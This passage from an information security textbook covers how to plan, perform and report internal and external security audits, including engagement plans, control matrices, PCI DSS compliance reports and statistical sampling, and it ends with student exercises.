14.3.1 Health First Case Study Problems For each case study problem, refer to the Health First Case Study. The Health First Case Study and Security Workbook should be provided by your instructor or can be found at https://sn.pub/lecturer-material. Health first case Case study study Defining security metrics √ Defining security metrics optional: Designing metrics √ for the requirements doc

Other resources Security workbook Health first requirements doc

References 1. CIS (2021) CIS Critical Security Controls®, Version 8, May 2021, Center for Internet Security 2. ISACA (2012) CRISC™ review manual 2013. ISACA, Arlington Heights, pp 100–101 3. ISACA (2015) CISM® review manual, 15th edn. ISACA, Arlington Heights 4. Kou Y, Lu C-T, Sirwonwattana S, Huang Y-P (2004) Survey of fraud detection techniques. In: IEEE international conference on networking, sensing & control. Inst. Electrical & Electronics Eng (IEEE). http://ieeexplore.ieee.org, pp 749–753 5. McMillan A (2013) Funding your programs through smart risk and security management. In: SC congress Chicago, 20 November 2013 6. Open Web Application Security Project (OWASP) (2014) Software assurance maturity model, ver 1.0. http://www.opensamm.org/downloads/SAMM-­1.0.pdf. Accessed 15 Nov 2014 7. Rosenbaum R (2012) Cassandra syndrome. Smithsonian 43(1):15 8. SANS (2013) Critical controls for effective cyber defense, ver 4.1. March 2013. www.sans.org 9. Verizon (2013) Verizon 2013 data breach investigations report. http://www.verizonenterprise. com/DBIR/2013. Accessed 20 Oct 2013

Chapter 15

Performing an Audit or Security Test

My crime is that of outsmarting you, something that you will never forgive me for. –Mentor (hacker) [1]

Compliance means that the organization and its actors adhere to applicable regulation and organizational policy and standards. Auditors are professional evaluators who test for compliance and/or that certain objectives are met. Therefore, understanding audit techniques professionalize testing, whether it is done for test or audit purposes. The Certified Information Systems Auditor (CISA) definition of audit is [2]: Systematic process by which a qualified, competent, independent team or person objectively obtains and evaluates evidence regarding assertions about a process for the purpose of forming an opinion about and reporting on the degree to which the assertion is implemented.

Each of these words was carefully selected. The qualified, competent, independent team or person means that the auditor is competent and knowledgeable in the specific audit task that is being evaluated. Professional independence means the auditor is independent in “fact and appearance” as regarded by any typical third party [3]. This tends to mean that every auditor is not related, has no financial ties, is not close friends with, and does not date, flirt, party or normally associate with the individuals being audited. Organizational independence means that the auditor and auditing company does not have any special financial ties to the organization being audited. Objectively obtains and evaluates evidence means that the auditor must obtain and analyze objective, reliable, qualified and proven facts. Sources of evidence should include internal documentation, external letters, contracts, interview notes from qualified persons, electronic data, and test results. Assertions about a process implies that the auditor cannot certify that no transaction is fraudulent, but is analyzing the process to ensure that precautions have been taken to minimize fraud and implement sufficient controls. Assertions are the claims that management is making about the integrity of its process [3]. Forming an opinion about and reporting on is about the final result: an assessment report, which depends upon expertise and facts to express a realistic, accurate view as to the validity of the process.

© The Author(s), under exclusive license to Springer Nature Switzerland AG 2024 S. Lincke, Information Security Planning, https://doi.org/10.1007/978-3-031-43118-0_15

271

272

15  Performing an Audit or Security Test

Auditing/testing can be classified by levels: internal testing, internal audit and external audit. Internal testing occurs when a security group or quality control tests their own security controls. Internal audit occurs when an organization has an audit group, separate from IT/security, which performs in-house auditing of the IT/security and business departments. This internal process prepares an organization for an external audit. The internal audit group is authorized by an audit charter, which describes the group’s responsibility, accountability and authority. The charter outlines management’s responsibility, audit’s reporting hierarchy (to top management) and is signed off by the highest levels of management [2]. The main purposes of audit are to measure conformance to policy, standards and regulation, and to evaluate organizational risk [4]. PCI DSS requires limited auditing, as described later. In the U.S., external audits are required by FISMA and Sarbanes-Oxley for corporations, and are recommended for nonprofits. During an external audit for SOX, an independent audit organization formally reviews the internal controls and the integrity of an organization’s financial statements in order to report the organization’s efficacy to external stakeholders (e.g., shareholders of a corporation) [5]. This chapter includes two major sections: the first section is on internal testing or informal audit and the second on external or professional audit. Much of professional auditing is useful knowledge, even for internal testing and auditing. Therefore, the section on professional audits builds on the first section on internal testing/audit, which incorporates simpler audit ideas.

15.1 Testing Internally and Simple Audits In the perfect world, an organization would fully test all systems, thoroughly, in an automated fashion. However, this is rarely possible. Therefore, shortcuts that make best use of the auditor’s test time include scheduling, random sampling, priority [2] and automation. Scheduling is useful to evaluate different components of the organization in different quarters or years; all important sectors or systems get tested eventually, but just not this year. Scheduling and priority should be considered for all test and audit planning. Factors for short-term planning (i.e., this year) include [2]: • Risk: Some aspects of business are more susceptible to risk or have recently changed; • Regulation: Conformance to regulation is high priority, particularly if regulatory requirements have recently changed; • Tools: new or reconfigured evaluation tools demand testing. The tests that cannot be accomplished this year can be scheduled for future years, as part of a long-term plan. Table  15.1 shows a short-term audit plan for Einstein University. Timeframes are given in quarters (Q). The date of last test helps to determine the priority. The Responsibility column allocates accountability for the test, and indicates where external consultants will be used. This audit plan should be updated and discussed with upper management annually [6].

273

15.1  Testing Internally and Simple Audits Table 15.1  Audit plan schedule (workbook exercise) Audit area Policies & Procedures for Registration, Advising PCI DSS audit FERPA: Personnel interviews IT: Penetration Test

Time-­ frame 1Q

Date of last test Never

2Q

2024

3Q 4Q

Never 2023

Responsibility Internal auditor CIO, Security consultant Internal auditor CIO, Security consultant

An Audit Engagement is a specific audit task, such as one row in the Audit Plan [7]. The steps of a risk-based audit include [8]: 1. Gather Information, Plan Audit: Learn about the organization, assess risk, and prepare the audit plan. 2. Review the Design of Internal Controls: Determine on paper whether the design of controls is effective to achieve management assertions or policy claims. 3. Perform Compliance and Substantive Tests: Validate that the controls are effective and business transactions are processed properly. 4. Prepare and Present Report: Write an audit report and present it to agreed-­ upon parties. These four steps are covered in the next four subsections. However, a more detailed diagram of functions is shown in Fig. 15.1, which is an Activity Diagram (or flow chart) of the audit engagement process. To read the diagram, start at the top left bullet and follow arrows. The left column represents the first two steps in the four-step audit process. The two thick vertical lines indicate that the lighter-colored middle processes occur in parallel and complete (usually) before the right column begins. The two dark processes on the bottom right are part of the fourth step: Prepare and Present Report.

15.1.1 Step 1: Gathering Information, Planning the Audit The first goal is to understand the business environment, particularly related to the scope of the audit. This may include touring the facilities, reading background material, and reviewing business and IT strategic plans. What regulation must the organization adhere to? To learn about previous problems, the auditor should review previous audit reports and consider inherent risks that are common to the industry. Interviewing key managers will help in understanding the business and areas that are outsourced. Having a good grasp of the business environment will enable the auditor to understand the big picture and fit details into context, regardless of whether an internal or external audit is being performed.

274

15  Performing an Audit or Security Test

Fig. 15.1  Activity diagram of the audit engagement process

The Engagement Letter normally describes the objectives and scope of the audit, as well as the set of deliverables, assigned responsibility and authority, budget, timeline, and who the audit report will go to [3]. The Audit Subject is the area to be audited, e.g., “Information Systems related to Sales”. The Audit Objective is the purpose of the audit, such as: “Determine whether Sales database is secure against data breaches, due to inappropriate authentication, access control, or hacking” or “Confirm adherence to regulation X”. The Audit Scope constrains the audit to a specific system, function, unit, or period of time, such as: “The scope is constrained to headquarters for the last year”. This document focuses the audit, and defines the beginning part of the Audit Engagement Plan. The risk-based auditing approach considers what risks might result in a business disturbance, such as a financial loss, a regulatory infraction, business interruption, and/or loss of public trust. As a result of this risk analysis, the auditor can set priorities to focus the audit and determine how problems might be categorized into different significance levels (e.g., Material Weakness versus a Deficiency) [7]. Risk-based auditing considers the overall audit risk, which considers that the audit may not find significant deficiencies that do exist [6]. Audit risk includes the inherent risks, control risks and detection risks for a company [2]. Inherent Risk addresses problems that certain companies, industries or components tend to be prone to. For example, a bank’s inherent risk is a robber, and a school’s inherent risk is student hacking and open systems. Control Risks are vulnerabilities that internal controls fail to safeguard against. An example of a control risk would be an IPS that does not catch a proprietary file exfiltration. A Detection Risk could occur when an auditor does not detect a problem that does exist. For example, insufficient segregation of duties results in fraud, but is not caught by an auditor. Risk is considered

15.1  Testing Internally and Simple Audits

275

relative to the business, technological factors, national environment, contractual issues, and project [3]. Once risks are considered, the audit engagement plan (or test plan) can be developed [3]. At a minimum the audit objective, audit scope and audit approach should be defined. The Constraints section may list limitations imposed to safeguard the auditor or auditee, such as requirements to execute high-volume tests during lowvolume times, specify auditor requirements for assistance, or notify the security department before using hacking tools. The Compliance and Criteria section describes the regulation, external standards/guidelines (e.g., industry best practice, security standards, audit frameworks) and/or organizational policy that will be used as a standard to benchmark the audit against. The Risk Analysis section summarizes the evaluated risk, including where the ‘gold’ lies in the area under test and the high-risk activities within this network. The Audit Approach lists the high-level methodology or summary strategy of the testing that will occur. An optional Checklist provides a detailed list of tests or actions to be taken. The checklist is useful as part of a test plan or internal audit, to carefully plan the detailed audit and to get specific permission for all planned security activities [4]. An ethical hacking tester may use vulnerability, scanning, sniffer and other hacking tools, as well as social engineering techniques [10]. An auditor may in addition or alternatively analyze documentation or audit logs, interview or observe personnel, flowchart applications, and/or use general audit software to generate and perform tests [2]. The audit plan checklist should be detailed, describing for example, who will be interviewed and the specific required documentation. When developing the Checklist, auditors recognize that it is not possible to test all components. Therefore, auditors test a random sample incorporating all or most types of components (e.g., transactions, devices, stores). Random sampling is useful, but some components may be more important to test than others based on increased risk. Therefore, risk raises the priority of certain tests, so that they are scheduled sooner and more often. Alternatively, critical components may be randomly tested at a higher rate than other components. Automation enables testing to occur frequently, such as daily or weekly, to safeguard integrity. Random sampling will be discussed further in the professional audit section. The Audit Engagement Plan is presented during the Entrance Conference to the auditee organization, and specifically to the persons and managers who will participate in the audit. This enables auditees to be aware of what is happening, what is expected of them, and when it will happen [4]. It is important that the people who will participate in the audit be present, to inform them, help in scheduling, and possibly provide important feedback. A manager of the auditee organization should sign the Audit Engagement Plan. More extensive audit plans would include a project plan, including a schedule or timeline, documentation/deliverables, a set of required skills, resources and tools, and a communication plan telling the auditee of the report distribution [3]. Table 15.2 Audit Engagement Plan Example shows a shortened version of an audit engagement plan, showing minimal (test-oriented) sections and sample text. (The figure shows a draft, but actual plans would always be fully typed.)

276

15  Performing an Audit or Security Test

Table 15.2  Audit engagement plan example (workbook exercise) Title: 2023 Audit engagement plan for Einstein University’s student DB web interface Objective: Determine security of web interface for student databases Scope: Penetration test on all web pages related to student-accessed databases: Registration, financial aid, coursework, and grading. Compliance and criteria: State breach notification law, FERPA Constraints: Must perform security hacking tests between 1 and 6 AM Risk analysis: Inherent risks: (risks organization is predisposed to)   Data breach: Student grades, disabilities (FERPA), student health (HIPAA), student and employee financial account and payment card information (PCI DSS, state breach), student social security number and passport numbers (state breach). Students may agree to publish contact information annually (FERPA).   Hacking: University is an open system, with no limitations on installed software and BYOD devices. Student homework must be protected. Control risks: (risk that a control has vulnerability(s))   Insufficient firewall/IPS restrictions: While much of the university network is open, enabling the presence of malware, critical databases must be in a secure zone with a high level of restrictive access. Detection risk: (risks of auditor not detecting a problem)   Hacker within confidential zone: This audit may not detect an infiltrated confidential zone or critical vulnerability. Approach: The penetration test includes:   1. Tester has valid session credentials (i.e., is a student)   2. Specific test records are available for attack   3. Test attack on all databases using manual and automated web testing tools   4. Attempt DDOS attack without using credentials Checklist   The following databases & forms will be tested: Registration process, financial aid and payment process, classroom software with homework assignments, submission and grading, accessing grades, advising records, transcripts …   Security attacks will be tested for all databases/forms: Invalid input, buffer overflow, SQL injection, cross-site scripting, cross-site request forgery, clickjacking.   Logs will be confirmed for identifying attacks (but not user errors) including the above listed attacks and those that failed in previous audits   Confidential zone audit: Firewall scan, network sniffing, log analysis of server and firewall. Signatures: Ellie Smith CISO Terry Doe CISA Date: June 1, 2023

The most important part of the audit plan is the Signature at the bottom, because it gives an auditor or tester permission to perform the specified security tests [4]. It is the auditor’s Get-Out-Of-Jail-Card, in case testing results in some undesirable results or news. There have been a number of cases where ethical hackers and even IT employees have been prosecuted for hacking when they discovered breaches or security problems and tried to report them. An example of an external hacker who handled his discovery poorly follows next, but do know that employees have been treated similarly when they performed, but were not authorized to execute, certain security tests: “Weev” Auernheimer created a web crawler to access publicly available information on AT&T’s Internet, and reported a security breach to the Gawker blog [1].

15.1  Testing Internally and Simple Audits

277

The breach information included email addresses of 114,000 iPad users, including Mayor Michael Bloomberg, and Rahm Emanuel, then White House chief of staff. His whistleblowing efforts resulted in a prison sentence of 41 months and a $73,000 fine for breach notification damages to AT&T. In summary, be sure to ALWAYS get specific permission before performing any security tests, even if you believe it is in your list of job responsibilities. Once the Audit Engagement Plan is signed, the audit can begin.

15.1.2 Step 2: Reviewing Internal Controls The first audit step is to organize the set of controls to determine whether the internal controls are at least theoretically adequate or whether an enhancement in security design is necessary. Preventive controls are most desirable, but detective and corrective controls also play an important role. During the third stage the auditor will test the controls to validate their implementation, including determining their specific capabilities and configuration. A control matrix (Table 15.3) is useful in this stage’s theoretical analysis to evaluate the design of controls: where controls are weak or insubstantial and where vulnerabilities exist [2]. To prepare a control matrix, list attacks or problems as column headings across the top row of the table. List controls as row headings down the left-most column. Attacks and controls can be added as needed. Controls are evaluated per vulnerability as strong (***), medium (**), weak (*), or blank for not applicable, appropriate, or available. In addition, controls can be evaluated as Preventive (p), Detective (d), or Corrective (c). Table 15.3 notes Strong Preventive as (pp). An Overlapping Control is two strong controls, and of course that is preferred. A Compensating Control is where a strong control supports a weak one. It is recommended that at least one strong control exists per vulnerability and that multiple controls exist. This table may be listed directly within the audit report findings. The controls matrix is only a theoretical evaluation. The actual implementation of the controls is tested during the next step.

15.1.3 Step 3: Performing Compliance and Substantive Tests To actually test out the controls requires working closely with members of the auditee organization. Be careful not to antagonize! The auditor should always be polite and never use an accusatory tone or words with the persons they are working with [4]. It is possible to inform by saying “best practices involve …” Avoid using the ‘you’ term, such as “you should …” Their feedback can be included in the final report, as well as your professional opinion. It is a good to note and include in the final report where the organization is doing things well and who is performing

15  Performing an Audit or Security Test

278

Table 15.3  Audit controls matrix (workbook exercise) Disk Power Problem-> Control v failure failure Access Control Authentication Antivirus Firewall Logs/Alarms/ d d SIEM Physical security Strong policies, cc cc standards, guidelines, procedures Security awareness training Vulnerability pp mgmt. Email security mgmt. Application firewall

Data breach Fraud Hack P p p pp pp pp d pp pd c d P

Social Malware engineer p p pd p d

p

Stolen/Lost equipment d

pp p

d pp

dd

p

p

ppd

pd

p

p

d

pd

particularly well, in addition to where improvements need to be made … in a tactful way. An audit or auditor may focus on one or both of compliance or substantive testing. Compliance tests evaluate security controls, whereas substantive tests evaluate that business transactions are properly processed. Figure 15.2 shows that when we think of the defense in depth onion analogy, the onion layers are the security controls (compliance) that protect the (substantive) business data, which is in the core of the onion. Thus, substantive tests ensure that transactions are valid and not modified or destroyed in processing. For example, a batch processing control validates throughout processing that the total number of transactions, the financial transaction total, and/or a hash total on certain fields remains consistent. Batch controls ensure that any problem transactions are resolved [2]. Another form of substantive testing is input validation [2]: • • • •

Sequence Check: Sequence numbers are indeed sequential. Range check: Input data is within appropriate lower and upper bounds. Validity check: Input can be one of a set of valid entries (e.g., sex = M or F). Reasonableness check: The transaction appears normal. For example, an order count is within the normal range of purchases. • Existence check: All required fields have been input; optional fields need not be entered.

15.1  Testing Internally and Simple Audits

279

Fig. 15.2  Substantive versus compliance testing

• Key verification: An entry is typed twice to ensure accuracy, e.g., in setting up a password. • Logical relationship check: Data entered is consistent, e.g., a child of 5  years does not have a driver’s license number. • Check digit: An algorithm on a field is used to generate a check digit, which matches an entered number when the field is entered correctly. This check protects against transcription errors. • Type check: Entered data is in the appropriate form. For example, a name would not consist solely of numbers; or a quantity field allows only numbers. The focus of this book is security controls or the compliance arena. A first security test may ensure that servers and user computers are securely configured, with needless services removed, and exposed vulnerabilities resolved, that may bring unwanted attention [12]. The test should also validate that all systems are patched, two-factor authentication including strong passwords are used, backups are verified regularly, updated antivirus software is implemented, and users are trained for security awareness. Continuous Audit is a more advanced stage of audit, which automates the validation of security controls. Regularly (weekly, daily, or more frequent) checking of preventive and detective security controls executes automatically and provides reports and alerts. Many of the top 18 controls, as outlined in the Metrics chapter, are best implemented using seamless and automated security checks.

280

15  Performing an Audit or Security Test

An auditor relies upon a number of software tools to perform substantive and compliance tests, including tools which access and analyze data in databases and which perform penetration and vulnerability tests. These software tools are called Computer-Assisted Audit Techniques (CAAT). They may include utility software, network scanning software, application traces, expert systems, and generalized audit software. The auditor often specifies these tests in the audit plan and report.

15.1.4 Step 4: Preparing and Presenting the Report The Audit Report should have a unique title and publish date. The Objective, Scope, Period of Audit and Compliance and Criteria sections can be copied from the Audit Engagement Plan. The Executive Summary describes, in non-technical language, the auditor’s overall opinion about the effectiveness of controls, the risks resulting from any deficiencies, and any reservations or qualifications the auditor holds [2]. The Detailed Audit Findings and Recommendations section describes the findings and recommendations, organized in a logical manner by materiality or intended recipient [2]. It may or may not include minor deficiencies, which can be communicated separately via a letter, depending on management preference. Finally, the document should include the names and signatures of the auditors. The document should be written clearly. Table 15.4 shows an abbreviated Audit Report. Optional sections may include a distribution list, a list of management assertions, proposed rework dates, statements of responsibility, disclaimers and audit methods used [8]. Assertions, if included, are the auditee management statements indicating Table 15.4  Abbreviated audit report (workbook exercise) Title: 2023 Audit report for Einstein University’s student DB web interface Objective: Determine security of web interface for student databases Scope: Penetration test on all web pages related to student-accessed databases: Registration, financial aid, coursework, and grading. Period of audit: May 21–28, 2023 Compliance and criteria: Compliance: State breach notification law, FERPA Criteria: Top 18 controls, certified ethical hacker tests related to web penetration tests. Assertions: As per audit engagement letter, dated March 5, 2023, management asserted that: University management has established effective internal controls for accounting and information systems, and is compliant with all laws. Management agreed to provide all necessary documentation for the audit, including policies, procedures and previous audit data; as well as auditor access to the applicable systems as a student user. Executive summary: It is the opinion of the auditor that there were material weaknesses within the web interface. Web interface A and B were secure, but web interface C and D need additional security. Detailed findings and recommendations: The following attacks were successful on the indicated databases. Also listed are the recommended fixes. … Evidence: Screenshots are attached in Appendix A. Signed: John Smith, CISA CISSP  Date: 4/13/2023

15.2  Example: PCI DSS Audits and Report on Compliance

281

adherence to regulation, establishment of internal controls, a lack of awareness of existing fraud, and a promise of cooperation for auditor-requested documentation. Management Assertions can serve as audit criteria to test against. Both external and internal audits would have many or some additional statements of responsibility, respectively. These statements would detail expectations, mainly of the auditee, in providing the necessary documentation, agreeing to audit criteria, and disclosing any outstanding issues. The report may also include disclaimers to limit auditor liability, for example for undetected fraud and future changes of control use. These sections are not included in Table 15.4, but can be found in ISACA’s “IS Audit and Assurance Guideline 2401 Reporting” [8]. The audit report should disclose specific measurement methods used (if multiple options exist), if any deviations from normal measurement practices were used, or if and where any interpretation of data impacted the result. After preparing the audit report, the auditor tactfully presents the report to the persons who participated in the audit as part of an Exit Conference [4]. Some meeting feedback (e.g., reasons or compensating controls) may be discussed, which can be added to the final report. The auditor does not change their audit opinion, but they can add the opinion or reasons provided by staff. Then external (and possibly internal) auditors would present their report to upper management. Both presentations should indicate things done well, as well as areas of improvement. The report to upper management should avoid being overly technical. An audit is useless unless management acts on its findings. Management is responsible for defining how it will address shortcomings in some form of an audit response plan. Security testers and internal auditors would normally follow-up to ensure that the plan addresses deficiencies, and that those deficiencies are fixed [2]. Alternatively management must take responsibility for not acting [3].

15.2 Example: PCI DSS Audits and Report on Compliance The document: Payment Card Industry, Requirements and Security Assessment Procedures, found at www.pcisecuritystandards.org serves as an excellent baseline security audit plan [13]. At a very high level, PCI DSS requires quarterly scanning tests and an annual penetration test. The pen test should also be performed after any significant change in either hardware, system software or important application change in a critical zone. In addition to high-level requirements, PCI DSS also provides a detailed list of tests for each of the 12 PCI DSS basic requirements; a short sample of which is shown in Table 15.5 [13]. Note that these tests are detailed and explicit, enabling the audit plan to be clearly understood. A PCI DSS Report on Compliance (ROC) is a form of an audit report. The outline of the ROC is as follows [13]:

282

15  Performing an Audit or Security Test

Table 15.5  Short snapshot of PCI DSS testing requirements [11] Defined approach requirement 9.1.2 Roles and responsibilities for performing activities in requirement 9 are documented, assigned, and understood.

Defined approach testing procedure 9.1.2.a Examine documentation to verify that descriptions of roles and responsibilities for performing activities in requirement 9 are documented and assigned. 9.1.2.b Interview personnel with responsibility for performing activities in requirement 9 to verify that roles and responsibilities are assigned as documented and are understood. 9.2.1 Appropriate facility entry controls 9.2.1 Observe entry controls and interview responsible are in place to restrict physical access to personnel to verify that physical security controls are systems in the CDE. in place to restrict access to systems in the CDE.

1. Contact Information and Report Summary: This summary includes a description of the auditee  and auditor  organizations, the dates of the audit, portions tested remotely versus onsite, a summary of findings for this audit, and signatures. 2. Business Overview: High-level summary of the payment card operations of the business. 3. Scope of Work and Approach Taken: The scope of the audit indicates the parts of the organization that were actually reviewed, including which business environments and network segments were covered and if sampling was used. It is important to record all cardholder processing equipment and software, their versions, and whether each is PA-DSS compliant. 4. Details about Reviewed Environment: This section outlines a detailed description of the cardholder data environment, including how payment card data is specifically processed, which files are used and how they are secured, and how access is logged. It includes a high level network diagram and account data flow diagram. This section also defines any managed service provider or third party access to cardholder data/equipment.  Of particular interest is whether any wholly-owned entities (e.g., third party), international or wireless environments were included. To achieve PCI DSS compliance, it is possible to use sampling. However, sampling must cover all possible business and technological configurations, and be geographically diverse. For example, it is not possible to simply test Sun OS equipment, without testing Microsoft or other used equipment. It is also important to justify, in a documented rationale, how sampling was appropriate and complete. 5. Quarterly Scan Reports: After the first year, the organization must pass all four quarterly scans. Internal and external scan results are included. Each scan shall cover all externally accessible (or Internet-facing) IP addresses for the organization. 6. Evidence: A description of documentation, interviews, observations and system evidence. 7. Part 2: Findings and Observations: This part follows the ‘Detailed PCI DSS Requirements and Security Assessment Procedures’ [11] template to provide a

15.3  Professional and External Auditing

283

detailed description of each finding. Any Not Applicable responses or compensating controls must be fully defined.

15.3 Professional and External Auditing Professional auditing is concerned that the audit follows a defined process and is well documented. Documentation of evidence should use a statistical-based analysis. Problems found by the audit are classified as to severity and follow-up ensures that issues are acted upon.

15.3.1 Audit Resources To guide auditors in following a professional audit process, ISACA provides a set of standards. Table  15.6 outlines ISACA’s IT Assurance Framework (ITAF) [9], which describes this set of standards and guidelines developed using materials from the IT Governance Institute (ITGI) and other sources. The IT Assurance Framework [9] recommends a possible extended outline for the audit engagement plan: • • • • • • • • • •

Areas to be audited Objectives Scope Resources: e.g., staff, tools, budget, schedules Timeline and deliverables Applicable laws/regulations and professional auditing standards Use of a risk-based approach, not related to regulatory compliance Engagement-specific issues Documentation and reporting requirements Planned use of technology and data analytics

Table 15.6  ISACA’s IT assurance framework [9] ISACA Standards General: Standards 1000 & Guidelines 2000 Performance: Standards 1200 & Guidelines 2200 Reporting: Standards 1400 & Guidelines 2400

Description Defines guiding principles for IT audit and assurance, including: Audit charter, organizational independence, auditor objectivity, reasonable expectation, due professional care, proficiency, assertions, criteria, etc. Audit and assurance engagement must include: Risk assessment and planning, audit scheduling, engagement planning, performance and supervision, evidence, using the work of other experts, irregularities and illegal acts. Audit report standards cover: Reporting, follow-up activities

284

15  Performing an Audit or Security Test

• Reflection on the cost of audit engagement versus potential benefits • Communication and escalation protocols for unplanned issues (e.g., changed schedules)

15.3.2 Sampling Evidence must be statistically significant to be valid and credible. Rarely can the entire population of data or controls be validated, so sampling is used to reach a conclusion. Sample transactions or units may be selected randomly or systematically, such as every N units [14]. Figure 15.3 shows that the sample population is a small subset of the total population, but the sample is hopefully representative of the population. This precision can be measured by comparing the sample and population mean and standard deviation. A confidence coefficient is the confidence level or probability that the sample truly represents the population. A confidence level of 95% is considered a high degree of comfort [2]. This type of sampling is called statistical sampling, and is useful in reaching conclusions about a population. Another means of achieving statistical sampling accuracy is by using a similar stratification for the sample as exists in the total population [14]. For example, if it is known that bank transactions are 60% credit/debit, and 10% deposits, withdrawals and ATM transactions, and 5% investments and loans, then sample transactions can be selected to match that stratification, as part of a Stratified Mean per Unit. Variable Sampling can estimate the population stratification or determine the appropriateness of the sample in representing the total population [2]. Difference Estimation is a use of Variable Sampling to compare the sample versus population stratification statistics. With Unstratified Mean per Unit, the population stratification is not known, and the sample stratification results are used to estimate the population stratification. These Variable Sampling techniques are shown in Fig.  15.4.

Fig. 15.3  Population sampling

15.3  Professional and External Auditing

285

Fig. 15.4  Variable sampling using stratification

Variable Sampling provides results as a total or average quantity, such as in monetary units, and is often used in substantive testing. In order to evaluate high risk areas, the auditor may choose to oversample a certain characteristic. Nonstatistical sampling or Judgmental sampling is used when the sample is not intended to match the general population, such as when samples are selected for a high-risk characteristic. Attribute Sampling is useful is in answering questions such as: How many of transaction X have this characteristic? This technique is commonly used in compliance testing to measure the rate of compliance [2]. An example test might be: How many transaction batches with errors were fully analyzed and properly documented? The Tolerable Error is the maximum problem rate that an auditor will accept before passing a test [2]. In some cases, the observed problem rate may be very close to or exceed the Tolerable Error. Then it makes sense to test a larger sample to better understand the problem. Discovery Sampling is useful when the expected problem rate is extremely low (e.g., fraud), and is implemented by first testing some minimal sample. In Stop-or-Go Sampling, slightly more testing occurs if any problems are found: If the first 100 have zero errors, then stop; otherwise if the first 1000 have less than 10 errors, stop; and so on. If sampling sounds complicated, then Generalized Audit Software (GAS) can help. GAS is a utility that makes the auditor’s life easier by automating sampling and statistical operations. GAS can manipulate files by sorting, indexing, and merging files [2]. It can select and read a set of records to create a sample, and calculate statistical properties (including precision, stratification, frequency analysis) and other arithmetic operations (such as sequence checking, attribute sampling) on the sample.

286

15  Performing an Audit or Security Test

15.3.3 Evidence and Conclusions Evidence is taken from test results, documentation, interviews, observations and email. Evidence can be insufficient and/or contradictory. The most reliable evidence is external, objective, qualified and timely. External evidence is derived from sources outside the auditee organization, such as contracts, letters or reports. Objective evidence is evidence that is less prone to judgment, such as comparing actual transaction results and reports, compared to what someone might say. Knowledgeable people closest to the operation are more qualified sources than persons less involved. Finally, all evidence should refer to the time period under review. Problems that can be found during an audit include errors, omissions, irregularities and illegal acts [2]. These problems or audit exceptions can be ranked as an Inconsequential Deficiency, a Significant Deficiency, Material Weakness or Pervasive Weakness. An Inconsequential Deficiency is insignificant, even when combined with other problems [8]. A Significant Deficiency is a significant problem of some consequence. The Material Weakness designation may be used when controls are not in place, not in use, or are inadequate, or when multiple significant deficiencies result in a significant vulnerability, and whenever escalation is required [3]. A Pervasive Weakness indicates multiple material weaknesses. The audit report includes a summary evaluation, which considers the deficiencies in total. If a potential fraud or illegal action is found during the audit, the auditor should prioritize confirmation and get sufficient details on the problem, then report the finding to an appropriate level of management or the audit committee in an expedient way (i.e., before writing the audit report) [3]. Summary evaluations for audit engagements can be categorized as [8]: • Unqualified: Internal controls were effective. • Qualified: Control weaknesses exist or may exist but are not pervasive. This evaluation may be given when there is insufficient evidence or known material weaknesses. • Adverse: Significant deficiencies result in material weakness and pervasive weaknesses. • Disclaimer: The auditor cannot form an opinion since they cannot obtain sufficient and/or appropriate evidence. In addition to noting problems, the auditor should suggest fixes or remediations. If a fix is not available, mitigation techniques may be suggested. During audit presentations, the auditor should present all control weaknesses and specify in the report that appropriate management and governance has been informed of weaknesses [8].

287

15.4  Questions and Problems

15.3.4 Variations in Audit Types This section has so far focused on an IS Audit. However other types of audits exist [2]: • IS Audit: Evaluates Information Systems safeguards for data in efficiently providing confidentiality, integrity, and availability • Financial Audit: Assures integrity of financial statements • Operational Audit: Evaluates internal controls for a given process or area • Integrated Audit: Includes a combination of Financial, IS and/or Operational audits • Forensic Audit: Investigates a fraud or crime • Administrative Audit: Assesses the efficiency of a process or organization The Integrated Audit combines financial, operational and/or IS audit to focus on business risk [2]. A team of specialists work together to produce one integrated audit report. The integrated report helps management to better understand and relate to aspects they have less expertise with. Control Self-Assessment is a form of internal audit that involves many people in the organization. Functional areas become the first line of defense, when teams attend workshops to learn to design and assess controls locally [2]. This technique is beneficial in that employees are trained and get involved in the security design process, thereby helping them to own the process and detect risks quickly. It enhances external audit.

15.4 Questions and Problems 1. Vocabulary. Match each meaning with the correct word. Inherent risk Control risk Constraint

Audit risk Detection risk Audit objective

Audit subject Audit scope Audit plan

Audit engagement plan Compliance test Substantive test

(a) A business or industry is prone to specific risks. (b) A strategic schedule to audit parts of the organization during different years. (c) A test that ensures that proper processing of business transactions occurs. (d) A statement of the coverage of the audit, specifying geography, time and/or business unit. (e) A statement of the purpose of the audit, as defined in an audit plan. (f) A risk that a security control does not operate as expected. (g) A risk that an audit does not discover an existing problem. 2. Audit Plan for a Specific Regulation. Consider an industry you currently work in or would like to work in, and a regulation that applies to this industry. Assume

288

15  Performing an Audit or Security Test

the company is in your geographical region. You may use the Security Workbook Audit Chapter to complete the tables. (a) Create an ‘Audit Plan Schedule’ Table, similar to Table 15.1. In this plan, consider how you might schedule testing of the entire regulation (related to information security) over time. Specify the objective of each audit being scheduled. (b) Create an ‘Audit Engagement Plan’ Table, similar to Table  15.2. Develop one audit engagement plan, including a detailed checklist of tests, of the audits you planned in part (a) of this question. Hint: You may include reviewing documentation, interviewing or observing work, executing tests on data, or any other test functions shown or described in the section entitled: “Perform Compliance and Substantive Tests”. 3. Control Matrix for Specific Regulation. Consider an industry you currently work in or would like to work in, and a regulation that applies to this industry. Assume the company is in your geographical region. You may use the Security Workbook Audit Chapter to complete the table. (a) Create a ‘Control Matrix’ Table, similar to Table 15.3. Select six risks that you think are the highest priority for your industry. Then include as rows appropriate controls that you think will safeguard your organization. You have a blank check, and you may and should add controls as appropriate. Be sure to complete the table, showing whether controls are strong, medium or weak, and whether they are preventive, detective or corrective in nature. Add text explaining why you chose your controls, and why they warrant the rating you gave them. Note: Consider these sites: 1. PCI DSS: Access information from https://www.pcisecuritystandards. org/security_standards/. Select the PCI DSS link. Register and download ‘PCI DSS v4.0’. Skim the ‘Detailed PCI DSS Requirements’, starting on page 37. 2. European Union’s: Chap. 17 of this text or General Data Protection Regulation (GDPR) https://gdpr-­info.eu 3. USA’s: HIPAA/HITECH: Chap. 19 of this text or www.hhs.gov (Health and Human Services) and search for HIPAA. 4. USA’s: Gramm–Leach–Bliley and Red Flags Rule: Federal Trade Commission: http:// www.business.ftc.gov/privacy-­and-­security 5. USA’s: Sarbanes–Oxley: www.isaca.org (Organizations for standards/security) Your instructor may provide ‘Information Security Student Book: Using COBIT®5 for Information Security’, available at www.isaca.org. Additional information is at www.sans.org, search for ‘COBIT’. 6. USA’s: FISMA: Access www.nist.gov (National Institute for Standards and Technology) and search for FISMA. Specific link: 